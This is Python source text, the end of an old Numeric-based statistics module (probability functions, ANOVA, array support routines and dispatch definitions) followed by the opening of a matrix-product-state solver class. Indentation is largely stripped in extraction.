e = e * (a/z.astype(N.Float))
c = c + e
z = z + 1.0
# print '#2', z, e, c, s, c*y+s2
newmask = N.greater(z,chisq)
a_notbig_frozen = N.where(newmask*N.equal(mask,0)*(1-a_big),
c*y+s2, a_notbig_frozen)
mask = N.clip(newmask+mask,0,1)
probs = N.where(N.equal(probs,1),1,
N.where(N.greater(a,BIG),a_big_frozen,a_notbig_frozen))
return probs
else:
return s
def aerfcc(x):
"""
Returns the complementary error function erfc(x) with fractional error
everywhere less than 1.2e-7. Adapted from Numerical Recipes. Can
handle multiple dimensions.
Usage: aerfcc(x)
"""
z = abs(x)
t = 1.0 / (1.0+0.5*z)
ans = t * N.exp(-z*z-1.26551223 + t*(1.00002368+t*(0.37409196+t*(0.09678418+t*(-0.18628806+t*(0.27886807+t*(-1.13520398+t*(1.48851587+t*(-0.82215223+t*0.17087277)))))))))
return N.where(N.greater_equal(x,0), ans, 2.0-ans)
def azprob(z):
"""
Returns the area under the normal curve 'to the left of' the given z value.
Thus,
for z<0, zprob(z) = 1-tail probability
for z>0, 1.0-zprob(z) = 1-tail probability
for any z, 2.0*(1.0-zprob(abs(z))) = 2-tail probability
Adapted from z.c in Gary Perlman's |Stat. Can handle multiple dimensions.
Usage: azprob(z) where z is a z-value
"""
def yfunc(y):
x = (((((((((((((-0.000045255659 * y
+0.000152529290) * y -0.000019538132) * y
-0.000676904986) * y +0.001390604284) * y
-0.000794620820) * y -0.002034254874) * y
+0.006549791214) * y -0.010557625006) * y
+0.011630447319) * y -0.009279453341) * y
+0.005353579108) * y -0.002141268741) * y
+0.000535310849) * y +0.999936657524
return x
def wfunc(w):
x = ((((((((0.000124818987 * w
-0.001075204047) * w +0.005198775019) * w
-0.019198292004) * w +0.059054035642) * w
-0.151968751364) * w +0.319152932694) * w
-0.531923007300) * w +0.797884560593) * N.sqrt(w) * 2.0
return x
Z_MAX = 6.0 # maximum meaningful z-value
x = N.zeros(z.shape,N.Float) # initialize
y = 0.5 * N.fabs(z)
x = N.where(N.less(y,1.0),wfunc(y*y),yfunc(y-2.0)) # get x's
x = N.where(N.greater(y,Z_MAX*0.5),1.0,x) # kill those with big Z
prob = N.where(N.greater(z,0),(x+1)*0.5,(1-x)*0.5)
return prob
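#Scalar sanity check for the polynomial approximation above: the exact
#normal CDF is 0.5*(1+erf(z/sqrt(2))) (math.erf requires Python >= 2.7):
def _zprob_check():
    import math
    cdf = lambda z: 0.5 * (1.0 + math.erf(z / math.sqrt(2.0)))
    assert abs(cdf(0.0) - 0.5) < 1e-12
    assert abs(cdf(1.96) - 0.975) < 1e-3
    return cdf(1.0)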
def aksprob(alam):
"""
Returns the probability value for a K-S statistic computed via ks_2samp.
Adapted from Numerical Recipes. Can handle multiple dimensions.
Usage: aksprob(alam)
"""
if type(alam) == N.ArrayType:
frozen = -1 *N.ones(alam.shape,N.Float64)
alam = alam.astype(N.Float64)
arrayflag = 1
else:
frozen = N.array(-1.)
alam = N.array(alam,N.Float64)
arrayflag = 0
mask = N.zeros(alam.shape)
fac = 2.0 *N.ones(alam.shape,N.Float)
sum = N.zeros(alam.shape,N.Float)
termbf = N.zeros(alam.shape,N.Float)
a2 = N.array(-2.0*alam*alam,N.Float64)
totalelements = N.multiply.reduce(N.array(mask.shape))
for j in range(1,201):
if asum(mask) == totalelements:
break
exponents = (a2*j*j)
overflowmask = N.less(exponents,-746)
frozen = N.where(overflowmask,0,frozen)
mask = mask+overflowmask
term = fac*N.exp(exponents)
sum = sum + term
newmask = N.where(N.less_equal(abs(term),(0.001*termbf)) +
N.less(abs(term),1.0e-8*sum), 1, 0)
frozen = N.where(newmask*N.equal(mask,0), sum, frozen)
mask = N.clip(mask+newmask,0,1)
fac = -fac
termbf = abs(term)
if arrayflag:
return N.where(N.equal(frozen,-1), 1.0, frozen) # 1.0 if doesn't converge
else:
return N.where(N.equal(frozen,-1), 1.0, frozen)[0] # 1.0 if doesn't converge
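#The same Kolmogorov-Smirnov tail series written out for a scalar,
#Q(lam) = 2 * sum_{j>=1} (-1)**(j-1) * exp(-2*j**2*lam**2); the array code
#above adds masking and underflow guards on top of exactly this sum:
def _ksprob_scalar(alam, terms=100):
    import math
    total, sign = 0.0, 1.0
    for j in range(1, terms + 1):
        total += sign * 2.0 * math.exp(-2.0 * j * j * alam * alam)
        sign = -sign
    return total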
def afprob (dfnum, dfden, F):
"""
Returns the 1-tailed significance level (p-value) of an F statistic
given the degrees of freedom for the numerator (dfR-dfF) and the degrees
of freedom for the denominator (dfF). Can handle multiple dims for F.
Usage: afprob(dfnum, dfden, F) where usually dfnum=dfbn, dfden=dfwn
"""
if type(F) == N.ArrayType:
return abetai(0.5*dfden, 0.5*dfnum, dfden/(1.0*dfden+dfnum*F))
else:
return abetai(0.5*dfden, 0.5*dfnum, dfden/float(dfden+dfnum*F))
def abetacf(a,b,x,verbose=1):
"""
Evaluates the continued fraction form of the incomplete Beta function,
betai. (Adapted from: Numerical Recipes in C.) Can handle multiple
dimensions for x.
Usage: abetacf(a,b,x,verbose=1)
"""
ITMAX = 200
EPS = 3.0e-7
arrayflag = 1
if type(x) == N.ArrayType:
frozen = N.ones(x.shape,N.Float) *-1 #start out w/ -1s, should replace all
else:
arrayflag = 0
frozen = N.array([-1])
x = N.array([x])
mask = N.zeros(x.shape)
bm = az = am = 1.0
qab = a+b
qap = a+1.0
qam = a-1.0
bz = 1.0-qab*x/qap
for i in range(ITMAX+1):
if N.sum(N.ravel(N.equal(frozen,-1)))==0:
break
em = float(i+1)
tem = em + em
d = em*(b-em)*x/((qam+tem)*(a+tem))
ap = az + d*am
bp = bz+d*bm
d = -(a+em)*(qab+em)*x/((qap+tem)*(a+tem))
app = ap+d*az
bpp = bp+d*bz
aold = az*1
am = ap/bpp
bm = bp/bpp
az = app/bpp
bz = 1.0
newmask = N.less(abs(az-aold),EPS*abs(az))
frozen = N.where(newmask*N.equal(mask,0), az, frozen)
mask = N.clip(mask+newmask,0,1)
noconverge = asum(N.equal(frozen,-1))
if noconverge <> 0 and verbose:
print 'a or b too big, or ITMAX too small in Betacf for ',noconverge,' elements'
if arrayflag:
return frozen
else:
return frozen[0]
def agammln(xx):
"""
Returns the gamma function of xx.
Gamma(z) = Integral(0,infinity) of t^(z-1)exp(-t) dt.
Adapted from: Numerical Recipes in C. Can handle multiple dims ... but
probably doesn't normally have to.
Usage: agammln(xx)
"""
coeff = [76.18009173, -86.50532033, 24.01409822, -1.231739516,
0.120858003e-2, -0.536382e-5]
x = xx - 1.0
tmp = x + 5.5
tmp = tmp - (x+0.5)*N.log(tmp)
ser = 1.0
for j in range(len(coeff)):
x = x + 1
ser = ser + coeff[j]/x
return -tmp + N.log(2.50662827465*ser)
def abetai(a,b,x,verbose=1):
"""
Returns the incomplete beta function:
I-sub-x(a,b) = 1/B(a,b)*(Integral(0,x) of t^(a-1)(1-t)^(b-1) dt)
where a,b>0 and B(a,b) = G(a)*G(b)/(G(a+b)) where G(a) is the gamma
function of a. The continued fraction formulation is implemented
here, using the betacf function. (Adapted from: Numerical Recipes in
C.) Can handle multiple dimensions.
Usage: abetai(a,b,x,verbose=1)
"""
TINY = 1e-15
if type(a) == N.ArrayType:
if asum(N.less(x,0)+N.greater(x,1)) <> 0:
raise ValueError, 'Bad x in abetai'
x = N.where(N.equal(x,0),TINY,x)
x = N.where(N.equal(x,1.0),1-TINY,x)
bt = N.where(N.equal(x,0)+N.equal(x,1), 0, -1)
exponents = ( gammln(a+b)-gammln(a)-gammln(b)+a*N.log(x)+b*
N.log(1.0-x) )
# exponents below about -746 underflow N.exp; clip at -740 for safety
exponents = N.where(N.less(exponents,-740),-740,exponents)
bt = N.exp(exponents)
if type(x) == N.ArrayType:
ans = N.where(N.less(x,(a+1)/(a+b+2.0)),
bt*abetacf(a,b,x,verbose)/float(a),
1.0-bt*abetacf(b,a,1.0-x,verbose)/float(b))
else:
if x<(a+1)/(a+b+2.0):
ans = bt*abetacf(a,b,x,verbose)/float(a)
else:
ans = 1.0-bt*abetacf(b,a,1.0-x,verbose)/float(b)
return ans
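#If SciPy happens to be available (an assumption, not a dependency of this
#module), its regularized incomplete beta computes the same quantity and
#can cross-check afprob:
def _fprob_via_scipy(dfnum, dfden, F):
    from scipy.special import betainc
    return betainc(0.5 * dfden, 0.5 * dfnum, dfden / float(dfden + dfnum * F))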
#####################################
####### AANOVA CALCULATIONS #######
#####################################
import LinearAlgebra, operator
LA = LinearAlgebra
def aglm(data,para):
"""
Calculates a linear model fit ... anova/ancova/lin-regress/t-test/etc. Taken
from:
Peterson et al. Statistical limitations in functional neuroimaging
I. Non-inferential methods and statistical models. Phil Trans Royal Soc
Lond B 354: 1239-1260.
Usage: aglm(data,para)
Returns: t-statistic and p-value (only the two-level/t-test case is implemented)
"""
if len(para) <> len(data):
print "data and para must be same length in aglm"
return
n = len(para)
p = pstat.aunique(para)
x = N.zeros((n,len(p))) # design matrix
for l in range(len(p)):
x[:,l] = N.equal(para,p[l])
b = N.dot(N.dot(LA.inverse(N.dot(N.transpose(x),x)), # i.e., b=inv(X'X)X'Y
N.transpose(x)),
data)
diffs = (data - N.dot(x,b))
s_sq = 1./(n-len(p)) * N.dot(N.transpose(diffs), diffs)
if len(p) == 2: # ttest_ind
c = N.array([1,-1])
df = n-2
fact = asum(1.0/asum(x,0)) # i.e., 1/n1 + 1/n2 + 1/n3 ...
t = N.dot(c,b) / N.sqrt(s_sq*fact)
probs = abetai(0.5*df,0.5,float(df)/(df+t*t))
return t, probs
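#A modern-numpy sketch of the same two-group fit (numpy standing in for
#the old Numeric/LinearAlgebra modules; values are illustrative):
def _glm_sketch():
    import numpy as np
    para = np.array([0, 0, 0, 1, 1, 1])
    data = np.array([1.0, 2.0, 1.5, 3.0, 3.5, 2.9])
    levels = np.unique(para)
    x = np.column_stack([(para == l).astype(float) for l in levels])  # dummy design
    b = np.linalg.lstsq(x, data, rcond=None)[0]
    resid = data - x.dot(b)
    s_sq = resid.dot(resid) / (len(data) - len(levels))
    return b, s_sq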
def aF_oneway(*args):
"""
Performs a 1-way ANOVA, returning an F-value and probability given
any number of groups. From Heiman, pp.394-7.
Usage: aF_oneway (*args) where *args is 2 or more arrays, one per
treatment group
Returns: f-value, probability
"""
na = len(args) # ANOVA on 'na' groups, each in its own array
tmp = map(N.array,args)
means = map(amean,tmp)
vars = map(avar,tmp)
ns = map(len,args)
alldata = N.concatenate(args)
bign = len(alldata)
sstot = ass(alldata)-(asquare_of_sums(alldata)/float(bign))
ssbn = 0
for a in args:
ssbn = ssbn + asquare_of_sums(N.array(a))/float(len(a))
ssbn = ssbn - (asquare_of_sums(alldata)/float(bign))
sswn = sstot-ssbn
dfbn = na-1
dfwn = bign - na
msb = ssbn/float(dfbn)
msw = sswn/float(dfwn)
f = msb/msw
prob = fprob(dfbn,dfwn,f)
return f, prob
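#Equivalent one-way ANOVA F in modern numpy (numpy is an assumption here;
#the module itself targets the old Numeric package):
def _f_oneway_sketch(*groups):
    import numpy as np
    groups = [np.asarray(g, dtype=float) for g in groups]
    alldata = np.concatenate(groups)
    bign, na = len(alldata), len(groups)
    correction = alldata.sum() ** 2 / float(bign)
    sstot = (alldata ** 2).sum() - correction
    ssbn = sum(g.sum() ** 2 / float(len(g)) for g in groups) - correction
    sswn = sstot - ssbn
    return (ssbn / (na - 1)) / (sswn / (bign - na))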
def aF_value (ER,EF,dfR,dfF):
"""
Returns an F-statistic given the following:
ER = error associated with the null hypothesis (the Restricted model)
EF = error associated with the alternate hypothesis (the Full model)
dfR = degrees of freedom associated with the Restricted model
dfF = degrees of freedom associated with the Full model
"""
return ((ER-EF)/float(dfR-dfF) / (EF/float(dfF)))
def outputfstats(Enum, Eden, dfnum, dfden, f, prob):
Enum = round(Enum,3)
Eden = round(Eden,3)
dfnum = round(dfnum,3)
dfden = round(dfden,3)
f = round(f,3)
prob = round(prob,3)
suffix = '' # for *s after the p-value
if prob < 0.001: suffix = ' ***'
elif prob < 0.01: suffix = ' **'
elif prob < 0.05: suffix = ' *'
title = [['EF/ER','DF','Mean Square','F-value','prob','']]
lofl = title+[[Enum, dfnum, round(Enum/float(dfnum),3), f, prob, suffix],
[Eden, dfden, round(Eden/float(dfden),3),'','','']]
pstat.printcc(lofl)
return
def F_value_multivariate(ER, EF, dfnum, dfden):
"""
Returns an F-statistic given the following:
ER = error associated with the null hypothesis (the Restricted model)
EF = error associated with the alternate hypothesis (the Full model)
dfnum = degrees of freedom associated with the Restricted model
dfden = degrees of freedom associated with the Full model
where ER and EF are matrices from a multivariate F calculation.
"""
if type(ER) in [IntType, FloatType]:
ER = N.array([[ER]])
if type(EF) in [IntType, FloatType]:
EF = N.array([[EF]])
n_um = (LA.determinant(ER) - LA.determinant(EF)) / float(dfnum)
d_en = LA.determinant(EF) / float(dfden)
return n_um / d_en
#####################################
####### ASUPPORT FUNCTIONS ########
#####################################
def asign(a):
"""
Usage: asign(a)
Returns: array shape of a, with -1 where a<0 and +1 where a>=0
"""
a = N.asarray(a)
if ((type(a) == type(1.4)) or (type(a) == type(1))):
return a-a-N.less(a,0)+N.greater(a,0)
else:
return N.zeros(N.shape(a))-N.less(a,0)+N.greater(a,0)
def asum (a, dimension=None,keepdims=0):
"""
An alternative to the Numeric.add.reduce function, which allows one to
(1) collapse over multiple dimensions at once, and/or (2) to retain
all dimensions in the original array (squashing the summed one down to size 1).
Dimension can equal None (ravel array first), an integer (the
dimension over which to operate), or a sequence (operate over multiple
dimensions). If keepdims=1, the resulting array will have as many
dimensions as the input array.
Usage: asum(a, dimension=None, keepdims=0)
Returns: array summed along 'dimension'(s), same _number_ of dims if keepdims=1
"""
if type(a) == N.ArrayType and a.typecode() in ['l','s','b']:
a = a.astype(N.Float)
if dimension == None:
s = N.sum(N.ravel(a))
elif type(dimension) in [IntType,FloatType]:
s = N.add.reduce(a, dimension)
if keepdims == 1:
shp = list(a.shape)
shp[dimension] = 1
s = N.reshape(s,shp)
else: # must be a SEQUENCE of dims to sum over
dims = list(dimension)
dims.sort()
dims.reverse()
s = a *1.0
for dim in dims:
s = N.add.reduce(s,dim)
if keepdims == 1:
shp = list(a.shape)
for dim in dims:
shp[dim] = 1
s = N.reshape(s,shp)
return s
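#In modern numpy the keepdims bookkeeping above is a single call (numpy
#being an assumption, not a dependency of this module):
def _asum_numpy_equiv(a, dimension=None, keepdims=0):
    import numpy as np
    axis = tuple(dimension) if isinstance(dimension, (list, tuple)) else dimension
    return np.sum(a, axis=axis, keepdims=bool(keepdims))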
def acumsum (a,dimension=None):
"""
Returns an array consisting of the cumulative sum of the items in the
passed array. Dimension can equal None (ravel array first), an
integer (the dimension over which to operate), or a sequence (operate
over multiple dimensions, but this last one just barely makes sense).
Usage: acumsum(a,dimension=None)
"""
if dimension == None:
a = N.ravel(a)
dimension = 0
if type(dimension) in [ListType, TupleType, N.ArrayType]:
dimension = list(dimension)
dimension.sort()
dimension.reverse()
for d in dimension:
a = N.add.accumulate(a,d)
return a
else:
return N.add.accumulate(a,dimension)
def ass(inarray, dimension=None, keepdims=0):
"""
Squares each value in the passed array, adds these squares & returns
the result. Unfortunate function name. :-) Defaults to ALL values in
the array. Dimension can equal None (ravel array first), an integer
(the dimension over which to operate), or a sequence (operate over
multiple dimensions). Set keepdims=1 to maintain the original number
of dimensions.
Usage: ass(inarray, dimension=None, keepdims=0)
Returns: sum-along-'dimension' for (inarray*inarray)
"""
if dimension == None:
inarray = N.ravel(inarray)
dimension = 0
return asum(inarray*inarray,dimension,keepdims)
def asummult (array1,array2,dimension=None,keepdims=0):
"""
Multiplies elements in array1 and array2, element by element, and
returns the sum (along 'dimension') of all resulting multiplications.
Dimension can equal None (ravel array first), an integer (the
dimension over which to operate), or a sequence (operate over multiple
dimensions). A trivial function, but included for completeness.
Usage: asummult(array1,array2,dimension=None,keepdims=0)
"""
if dimension == None:
array1 = N.ravel(array1)
array2 = N.ravel(array2)
dimension = 0
return asum(array1*array2,dimension,keepdims)
def asquare_of_sums(inarray, dimension=None, keepdims=0):
"""
Adds the values in the passed array, squares that sum, and returns the
result. Dimension can equal None (ravel array first), an integer (the
dimension over which to operate), or a sequence (operate over multiple
dimensions). If keepdims=1, the returned array will have the same
NUMBER of dimensions as the original.
Usage: asquare_of_sums(inarray, dimension=None, keepdims=0)
Returns: the square of the sum over dim(s) in dimension
"""
if dimension == None:
inarray = N.ravel(inarray)
dimension = 0
s = asum(inarray,dimension,keepdims)
if type(s) == N.ArrayType:
return s.astype(N.Float)*s
else:
return float(s)*s
def asumdiffsquared(a,b, dimension=None, keepdims=0):
"""
Takes pairwise differences of the values in arrays a and b, squares
these differences, and returns the sum of these squares. Dimension
can equal None (ravel array first), an integer (the dimension over
which to operate), or a sequence (operate over multiple dimensions).
keepdims=1 means the return shape = len(a.shape) = len(b.shape)
Usage: asumdiffsquared(a,b)
Returns: sum[ravel(a-b)**2]
"""
if dimension == None:
a = N.ravel(a)
b = N.ravel(b)
dimension = 0
return asum((a-b)**2,dimension,keepdims)
def ashellsort(inarray):
"""
Shellsort algorithm. Sorts a 1D-array.
Usage: ashellsort(inarray)
Returns: sorted-inarray, sorting-index-vector (for original array)
"""
n = len(inarray)
svec = inarray *1.0
ivec = range(n)
gap = n/2 # integer division needed
while gap >0:
for i in range(gap,n):
for j in range(i-gap,-1,-gap):
while j>=0 and svec[j]>svec[j+gap]:
temp = svec[j]
svec[j] = svec[j+gap]
svec[j+gap] = temp
itemp = ivec[j]
ivec[j] = ivec[j+gap]
ivec[j+gap] = itemp
gap = gap / 2 # integer division needed
# svec is now sorted input vector, ivec has the order svec[i] = vec[ivec[i]]
return svec, ivec
def arankdata(inarray):
"""
Ranks the data in inarray, dealing with ties appropriately. Assumes
a 1D inarray. Adapted from Gary Perlman's |Stat ranksort.
Usage: arankdata(inarray)
Returns: array of length equal to inarray, containing rank scores
"""
n = len(inarray)
svec, ivec = ashellsort(inarray)
sumranks = 0
dupcount = 0
newarray = N.zeros(n,N.Float)
for i in range(n):
sumranks = sumranks + i
dupcount = dupcount + 1
if i==n-1 or svec[i] <> svec[i+1]:
averank = sumranks / float(dupcount) + 1
for j in range(i-dupcount+1,i+1):
newarray[ivec[j]] = averank
sumranks = 0
dupcount = 0
return newarray
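#Quick illustration of the tie handling above: equal values share the
#average of the ranks they jointly occupy.
def _rankdata_tie_demo():
    vals = [10, 20, 20, 30]
    order = sorted(range(len(vals)), key=lambda i: vals[i])
    ranks = [0.0] * len(vals)
    i = 0
    while i < len(vals):
        j = i
        while j + 1 < len(vals) and vals[order[j + 1]] == vals[order[i]]:
            j += 1
        for m in range(i, j + 1):
            ranks[order[m]] = (i + j) / 2.0 + 1.0
        i = j + 1
    assert ranks == [1.0, 2.5, 2.5, 4.0]
    return ranks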
def afindwithin(data):
"""
Returns a binary vector, 1=within-subject factor, 0=between. Input
equals the entire data array (i.e., column 1=random factor, last
column = measured values).
Usage: afindwithin(data) data in |Stat format
"""
numfact = len(data[0])-2
withinvec = [0]*numfact
for col in range(1,numfact+1):
rows = pstat.linexand(data,col,pstat.unique(pstat.colex(data,1))[0]) # get 1 level of this factor
if len(pstat.unique(pstat.colex(rows,0))) < len(rows): # if fewer subjects than scores on this factor
withinvec[col-1] = 1
return withinvec
#########################################################
#########################################################
###### RE-DEFINE DISPATCHES TO INCLUDE ARRAYS #########
#########################################################
#########################################################
## CENTRAL TENDENCY:
geometricmean = Dispatch ( (lgeometricmean, (ListType, TupleType)),
(ageometricmean, (N.ArrayType,)) )
harmonicmean = Dispatch ( (lharmonicmean, (ListType, TupleType)),
(aharmonicmean, (N.ArrayType,)) )
mean = Dispatch ( (lmean, (ListType, TupleType)),
(amean, (N.ArrayType,)) )
median = Dispatch ( (lmedian, (ListType, TupleType)),
(amedian, (N.ArrayType,)) )
medianscore = Dispatch ( (lmedianscore, (ListType, TupleType)),
(amedianscore, (N.ArrayType,)) )
mode = Dispatch ( (lmode, (ListType, TupleType)),
(amode, (N.ArrayType,)) )
tmean = Dispatch ( (atmean, (N.ArrayType,)) )
tvar = Dispatch ( (atvar, (N.ArrayType,)) )
tstdev = Dispatch ( (atstdev, (N.ArrayType,)) )
tsem = Dispatch ( (atsem, (N.ArrayType,)) )
## VARIATION:
moment = Dispatch ( (lmoment, (ListType, TupleType)),
(amoment, (N.ArrayType,)) )
variation = Dispatch ( (lvariation, (ListType, TupleType)),
(avariation, (N.ArrayType,)) )
skew = Dispatch ( (lskew, (ListType, TupleType)),
(askew, (N.ArrayType,)) )
kurtosis = Dispatch ( (lkurtosis, (ListType, TupleType)),
(akurtosis, (N.ArrayType,)) )
describe = Dispatch ( (ldescribe, (ListType, TupleType)),
(adescribe, (N.ArrayType,)) )
## DISTRIBUTION TESTS
skewtest = Dispatch ( (askewtest, (ListType, TupleType)),
(askewtest, (N.ArrayType,)) )
kurtosistest = Dispatch ( (akurtosistest, (ListType, TupleType)),
(akurtosistest, (N.ArrayType,)) )
normaltest = Dispatch ( (anormaltest, (ListType, TupleType)),
(anormaltest, (N.ArrayType,)) )
## FREQUENCY STATS:
itemfreq = Dispatch ( (litemfreq, (ListType, TupleType)),
(aitemfreq, (N.ArrayType,)) )
scoreatpercentile = Dispatch ( (lscoreatpercentile, (ListType, TupleType)),
(ascoreatpercentile, (N.ArrayType,)) )
percentileofscore = Dispatch ( (lpercentileofscore, (ListType, TupleType)),
(apercentileofscore, (N.ArrayType,)) )
histogram = Dispatch ( (lhistogram, (ListType, TupleType)),
(ahistogram, (N.ArrayType,)) )
cumfreq = Dispatch ( (lcumfreq, (ListType, TupleType)),
(acumfreq, (N.ArrayType,)) )
relfreq = Dispatch ( (lrelfreq, (ListType, TupleType)),
(arelfreq, (N.ArrayType,)) )
## VARIABILITY:
obrientransform = Dispatch ( (lobrientransform, (ListType, TupleType)),
(aobrientransform, (N.ArrayType,)) )
samplevar = Dispatch ( (lsamplevar, (ListType, TupleType)),
(asamplevar, (N.ArrayType,)) )
samplestdev = Dispatch ( (lsamplestdev, (ListType, TupleType)),
(asamplestdev, (N.ArrayType,)) )
signaltonoise = Dispatch( (asignaltonoise, (N.ArrayType,)),)
var = Dispatch ( (lvar, (ListType, TupleType)),
(avar, (N.ArrayType,)) )
stdev = Dispatch ( (lstdev, (ListType, TupleType)),
(astdev, (N.ArrayType,)) )
sterr = Dispatch ( (lsterr, (ListType, TupleType)),
(asterr, (N.ArrayType,)) )
sem = Dispatch ( (lsem, (ListType, TupleType)),
(asem, (N.ArrayType,)) )
z = Dispatch ( (lz, (ListType, TupleType)),
(az, (N.ArrayType,)) )
zs = Dispatch ( (lzs, (ListType, TupleType)),
(azs, (N.ArrayType,)) )
## TRIMMING FCNS:
threshold = Dispatch( (athreshold, (N.ArrayType,)),)
trimboth = Dispatch ( (ltrimboth, (ListType, TupleType)),
(atrimboth, (N.ArrayType,)) )
trim1 = Dispatch ( (ltrim1, (ListType, TupleType)),
(atrim1, (N.ArrayType,)) )
## CORRELATION FCNS:
paired = Dispatch ( (lpaired, (ListType, TupleType)),
(apaired, (N.ArrayType,)) )
pearsonr = Dispatch ( (lpearsonr, (ListType, TupleType)),
(apearsonr, (N.ArrayType,)) )
spearmanr = Dispatch ( (lspearmanr, (ListType, TupleType)),
(aspearmanr, (N.ArrayType,)) )
pointbiserialr = Dispatch ( (lpointbiserialr, (ListType, TupleType)),
(apointbiserialr, (N.ArrayType,)) )
kendalltau = Dispatch ( (lkendalltau, (ListType, TupleType)),
(akendalltau, (N.ArrayType,)) )
linregress = Dispatch ( (llinregress, (ListType, TupleType)),
(alinregress, (N.ArrayType,)) )
## INFERENTIAL STATS:
ttest_1samp = Dispatch ( (lttest_1samp, (ListType, TupleType)),
(attest_1samp, (N.ArrayType,)) )
ttest_ind = Dispatch ( (lttest_ind, (ListType, TupleType)),
(attest_ind, (N.ArrayType,)) )
ttest_rel = Dispatch ( (lttest_rel, (ListType, TupleType)),
(attest_rel, (N.ArrayType,)) )
chisquare = Dispatch ( (lchisquare, (ListType, TupleType)),
(achisquare, (N.ArrayType,)) )
ks_2samp = Dispatch ( (lks_2samp, (ListType, TupleType)),
(aks_2samp, (N.ArrayType,)) )
mannwhitneyu = Dispatch ( (lmannwhitneyu, (ListType, TupleType)),
(amannwhitneyu, (N.ArrayType,)) )
tiecorrect = Dispatch ( (ltiecorrect, (ListType, TupleType)),
(atiecorrect, (N.ArrayType,)) )
ranksums = Dispatch ( (lranksums, (ListType, TupleType)),
(aranksums, (N.ArrayType,)) )
wilcoxont = Dispatch ( (lwilcoxont, (ListType, TupleType)),
(awilcoxont, (N.ArrayType,)) )
kruskalwallish = Dispatch ( (lkruskalwallish, (ListType, TupleType)),
(akruskalwallish, (N.ArrayType,)) )
friedmanchisquare = Dispatch ( (lfriedmanchisquare, (ListType, TupleType)),
(afriedmanchisquare, (N.ArrayType,)) )
## PROBABILITY CALCS:
chisqprob = Dispatch ( (lchisqprob, (IntType, FloatType)),
(achisqprob, (N.ArrayType,)) )
zprob = Dispatch ( (lzprob, (IntType, FloatType)),
(azprob, (N.ArrayType,)) )
ksprob = Dispatch ( (lksprob, (IntType, FloatType)),
(aksprob, (N.ArrayType,)) )
fprob = Dispatch ( (lfprob, (IntType, FloatType)),
(afprob, (N.ArrayType,)) )
betacf = Dispatch ( (lbetacf, (IntType, FloatType)),
(abetacf, (N.ArrayType,)) )
betai = Dispatch ( (lbetai, (IntType, FloatType)),
(abetai, (N.ArrayType,)) )
erfcc = Dispatch ( (lerfcc, (IntType, FloatType)),
(aerfcc, (N.ArrayType,)) )
gammln = Dispatch ( (lgammln, (IntType, FloatType)),
(agammln, (N.ArrayType,)) )
## ANOVA FUNCTIONS:
F_oneway = Dispatch ( (lF_oneway, (ListType, TupleType)),
(aF_oneway, (N.ArrayType,)) )
F_value = Dispatch ( (lF_value, (ListType, TupleType)),
(aF_value, (N.ArrayType,)) )
## SUPPORT FUNCTIONS:
incr = Dispatch ( (lincr, (ListType, TupleType, N.ArrayType)), )
sum = Dispatch ( (lsum, (ListType, TupleType)),
(asum, (N.ArrayType,)) )
cumsum = Dispatch ( (lcumsum, (ListType, TupleType)),
(acumsum, (N.ArrayType,)) )
ss = Dispatch ( (lss, (ListType, TupleType)),
(ass, (N.ArrayType,)) )
summult = Dispatch ( (lsummult, (ListType, TupleType)),
(asummult, (N.ArrayType,)) )
square_of_sums = Dispatch ( (lsquare_of_sums, (ListType, TupleType)),
(asquare_of_sums, (N.ArrayType,)) )
sumdiffsquared = Dispatch ( (lsumdiffsquared, (ListType, TupleType)),
(asumdiffsquared, (N.ArrayType,)) )
shellsort = Dispatch ( (lshellsort, (ListType, TupleType)),
(ashellsort, (N.ArrayType,)) )
rankdata = Dispatch ( (lrankdata, (ListType, TupleType)),
(arankdata, (N.ArrayType,)) )
findwithin = Dispatch ( (lfindwithin, (ListType, TupleType)),
(afindwithin, (N.ArrayType,)) )
###################### END OF NUMERIC FUNCTION BLOCK #####################
###################### END OF STATISTICAL FUNCTIONS ######################
except ImportError:
pass
| dschwilk/traithull | stats/stats.py | Python | gpl-2.0 | 152,205 |
"""
Program name: MPS-Proba
Program purpose: The Alpha version of the APC 524 project.
File name: mpssolver.py
File purpose: the solver class based on the matrix product states
Responsible persons:
Peiqi Wang and Jun Xiong for Contraction and Compression
Bin Xu for Interpreter
"""
from solver import Solver
from copy import deepcopy
import numpy as np
import math
class MpsSolver(Solver):
"""
The MPS solver base class
"""
"""
Variables in the class
L: length of the chain
bound_dimension: dimension of the auxiliary space for the compressed MPS
n: dimension of the physical space
mps: current state expressed as an mps. It is the mps obtained after applying the mpo
mpsc: current compressed mps. It is obtained by calling the compression algorithm
mpo: operator. By convention we always apply the mpo on mpsc
partial_overlap_lr, partial_overlap_rl: the partial overlaps between mps and mpsc. These are only used by the variational compression algorithm
results: list of mps keeping the history
t: current time
epsil: error threshold for CompressionVariational.
cpr_err: error of the compression(L2 distance between compressed state and true state)
"""
"""CompressionSVDSweepToRight and CompressionSVDSweepToLeft are the two methods for SVD compression implemented by Jun Xiong. The result is stored in self.mpsc.
"""
##mps_element = ndarray(shape = (2, 10, 10), dtype = float) # this is just an example of the mps, the order of indices: physical, left_aux, right_aux
##mpo_element = ndarray(shape = (2, 2, 4, 4), dtype = float) # this is just an example of the mpo, the order of indices: physical_in, physical_out, left_aux, right_aux
def __init__(self, model, bound_dimension):
self.model = model
self.bound_dimension = bound_dimension
self.t=0
self.results = [] # list of mps_chain, result history
self.model.prepareMps()
self.model.prepareMpo()
self.interpreter()
def interpreter(self):
if self.model.model_type in self.boy_models:
self.mpo = self.model.mpo
self.mps = self.model.mps
#when initializing, put mpsc the same as mps so we can apply mpo on it
self.mpsc = deepcopy(self.model.mps)
self.results.append(self.mpsc)
self.L = len(self.model.mps)
self.n = np.shape(self.model.mps[0])[0]
self.partial_overlap_lr=[None]*self.L;
self.partial_overlap_rl=[None]*self.L;
self.cpr_err=0
self.epsil=0.00001
self.negative_norm_flag=0
else:
raise Exception("The model is not supported!")
"""def CompressionSVD(self):
The compression based on SVD, to be implemented by Jun Xiong
raise NotImplementedError("please implement")"""
def compression(self):
self.compressionSVD()
self.compressionVariational()
def evolve(self,nstep):
for i in range(nstep):
if (self.negative_norm_flag==0):
self.step()
else:
break
#Update the system state from t to t+1
def step(self):
print "Step:", self.t
self.t=self.t+1
self.contraction()
# self.compressionSVDSweepToRightTest()
# self.compressionSVDSweepToLeftTest()
self.compressionVariational(0,1,0)
self.results.append(self.mpsc)
def compressionSVDSweepToRight(self):
self.mpsc= []
self.mpsc.append(self.mps[0])
for i in range(0, self.L-1):
A=np.reshape(self.mpsc[-1],(self.mpsc[-1].shape[0]*self.mpsc[-1].shape[1],self.mpsc[-1].shape[2]))
U, s, V=np.linalg.svd(A, full_matrices=False)
